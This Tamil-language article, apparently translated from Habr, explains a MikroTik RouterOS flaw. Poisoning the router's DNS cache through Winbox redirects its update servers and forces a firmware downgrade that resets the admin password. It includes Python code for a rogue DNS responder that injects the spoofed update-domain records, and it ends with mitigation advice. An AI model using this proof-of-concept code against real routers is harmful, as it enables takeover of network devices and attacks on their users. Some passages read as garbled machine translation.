RouterOS இல் உள்ள பேக்போர்ட் பாதிப்பு நூறாயிரக்கணக்கான சாதனங்களை ஆபத்தில் ஆழ்த்துகிறது

RouterOS இல் உள்ள பேக்போர்ட் பாதிப்பு நூறாயிரக்கணக்கான சாதனங்களை ஆபத்தில் ஆழ்த்துகிறது

RouterOS (Mikrotik) அடிப்படையிலான சாதனங்களை தொலைவிலிருந்து தரமிறக்கும் திறன் நூறாயிரக்கணக்கான பிணைய சாதனங்களை ஆபத்தில் ஆழ்த்துகிறது. வின்பாக்ஸ் நெறிமுறையின் DNS தற்காலிக சேமிப்பில் உள்ள நச்சுத்தன்மையுடன் இந்த பாதிப்பு தொடர்புடையது மற்றும் சாதனத்தில் காலாவதியான (இயல்புநிலை கடவுச்சொல் மீட்டமைப்புடன்) அல்லது மாற்றியமைக்கப்பட்ட ஃபார்ம்வேரை ஏற்ற அனுமதிக்கிறது.

RouterOS இல் உள்ள பேக்போர்ட் பாதிப்பு நூறாயிரக்கணக்கான சாதனங்களை ஆபத்தில் ஆழ்த்துகிறது

பாதிப்பு விவரங்கள்

RouterOS டெர்மினல் DNS தேடலுக்கான தீர்வு கட்டளையை ஆதரிக்கிறது.

RouterOS இல் உள்ள பேக்போர்ட் பாதிப்பு நூறாயிரக்கணக்கான சாதனங்களை ஆபத்தில் ஆழ்த்துகிறது

இந்தக் கோரிக்கையானது, ரிசல்வர் எனப்படும் பைனரி மூலம் கையாளப்படுகிறது. RouterOS இன் Winbox நெறிமுறையுடன் இணைக்கும் பல பைனரிகளில் Resolver ஒன்றாகும். உயர் மட்டத்தில், வின்பாக்ஸ் போர்ட்டுக்கு அனுப்பப்படும் "செய்திகளை" வரிசை அடிப்படையிலான எண்ணிடல் திட்டத்தின் அடிப்படையில் RouterOS இல் உள்ள பல்வேறு பைனரிகளுக்கு அனுப்ப முடியும்.

முன்னிருப்பாக, ரூட்டர்ஓஎஸ் டிஎன்எஸ் சர்வர் அம்சம் முடக்கப்பட்டுள்ளது.

RouterOS இல் உள்ள பேக்போர்ட் பாதிப்பு நூறாயிரக்கணக்கான சாதனங்களை ஆபத்தில் ஆழ்த்துகிறது

இருப்பினும், சேவையக செயல்பாடு முடக்கப்பட்டிருந்தாலும், திசைவி அதன் சொந்த DNS தற்காலிக சேமிப்பை பராமரிக்கிறது.

RouterOS இல் உள்ள பேக்போர்ட் பாதிப்பு நூறாயிரக்கணக்கான சாதனங்களை ஆபத்தில் ஆழ்த்துகிறது

உதாரணமாக example.com க்கு winbox_dns_request ஐப் பயன்படுத்தி நாம் கோரிக்கை வைக்கும் போது, ​​திசைவி முடிவை தேக்ககப்படுத்தும்.

RouterOS இல் உள்ள பேக்போர்ட் பாதிப்பு நூறாயிரக்கணக்கான சாதனங்களை ஆபத்தில் ஆழ்த்துகிறது

கோரிக்கை செல்ல வேண்டிய DNS சேவையகத்தை நாம் குறிப்பிட முடியும் என்பதால், தவறான முகவரிகளை உள்ளிடுவது அற்பமானது. எடுத்துக்காட்டாக, நீங்கள் DNS சேவையக செயலாக்கத்தை உள்ளமைக்கலாம் பிலிப் கிளாஸ்192.168.88.250 ஐபி முகவரியைக் கொண்ட ஒரு பதிவுடன் எப்போதும் பதிலளிக்க வேண்டும்.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

இப்போது Winboxஐப் பயன்படுத்தி example.com எனத் தேடினால், ரூட்டரின் DNS கேச் விஷம் கலந்திருப்பதைக் காணலாம்.

RouterOS இல் உள்ள பேக்போர்ட் பாதிப்பு நூறாயிரக்கணக்கான சாதனங்களை ஆபத்தில் ஆழ்த்துகிறது

நிச்சயமாக, ரவுட்டர் உண்மையில் அதைப் பயன்படுத்தாததால், விஷம் example.com மிகவும் பயனுள்ளதாக இல்லை. இருப்பினும், ரூட்டருக்கு upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com மற்றும் download.mikrotik.com ஆகியவற்றை அணுக வேண்டும். மற்றொரு தவறுக்கு நன்றி, அவை அனைத்தையும் ஒரே நேரத்தில் விஷம் செய்ய முடியும்.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

திசைவி ஒரு அனுமதியைக் கோருகிறது, மேலும் நாங்கள் ஐந்து அனுமதியை வழங்குகிறோம். இந்த அனைத்து பதில்களையும் திசைவி சரியாக தேக்குவதில்லை.

RouterOS இல் உள்ள பேக்போர்ட் பாதிப்பு நூறாயிரக்கணக்கான சாதனங்களை ஆபத்தில் ஆழ்த்துகிறது

வெளிப்படையாக, திசைவி DNS சேவையகமாக செயல்பட்டால் இந்த தாக்குதல் பயனுள்ளதாக இருக்கும், ஏனெனில் இது திசைவியின் வாடிக்கையாளர்களை தாக்க அனுமதிக்கிறது.

இந்த தாக்குதல் மிகவும் தீவிரமான பாதிப்பை பயன்படுத்தவும் உங்களை அனுமதிக்கிறது: RouterOS இன் பதிப்பை தரமிறக்க அல்லது பேக்போர்ட் செய்யவும். சேஞ்ச்லாக் உட்பட புதுப்பிப்பு சேவையகத்தின் தர்க்கத்தை தாக்குபவர் மீண்டும் உருவாக்குகிறார், மேலும் ரூட்டர்ஓஎஸ் காலாவதியான (பாதிக்கப்படக்கூடிய) பதிப்பை தற்போதையதாக உணரும்படி கட்டாயப்படுத்துகிறார். பதிப்பு "புதுப்பிக்கப்படும்" போது, ​​​​நிர்வாகி கடவுச்சொல் இயல்புநிலை மதிப்பிற்கு மீட்டமைக்கப்படும் என்பதில் இங்குள்ள ஆபத்து உள்ளது - தாக்குபவர் வெற்று கடவுச்சொல்லுடன் கணினியில் உள்நுழைய முடியும்!


இந்த தாக்குதல் உண்மையில் வேலை செய்கிறது ஆசிரியர் தொடர்புடையவை உட்பட மேலும் பல திசையன்களை செயல்படுத்துகிறது ஃபார்ம்வேரில் பின்கதவை உட்பொதித்தல், ஆனால் இது ஏற்கனவே ஒரு தேவையற்ற நுட்பம் மற்றும் சட்டவிரோத நோக்கங்களுக்காக இதைப் பயன்படுத்துவது சட்டவிரோதமானது.

பாதுகாப்பு

Winbox ஐ வெறுமனே முடக்குவது இந்த தாக்குதல்களில் இருந்து உங்களைப் பாதுகாத்துக் கொள்ள அனுமதிக்கிறது. Winbox வழியாக நிர்வாகத்தின் வசதி இருந்தபோதிலும், SSH நெறிமுறையைப் பயன்படுத்துவது நல்லது.

ஆதாரம்: www.habr.com

கருத்தைச் சேர்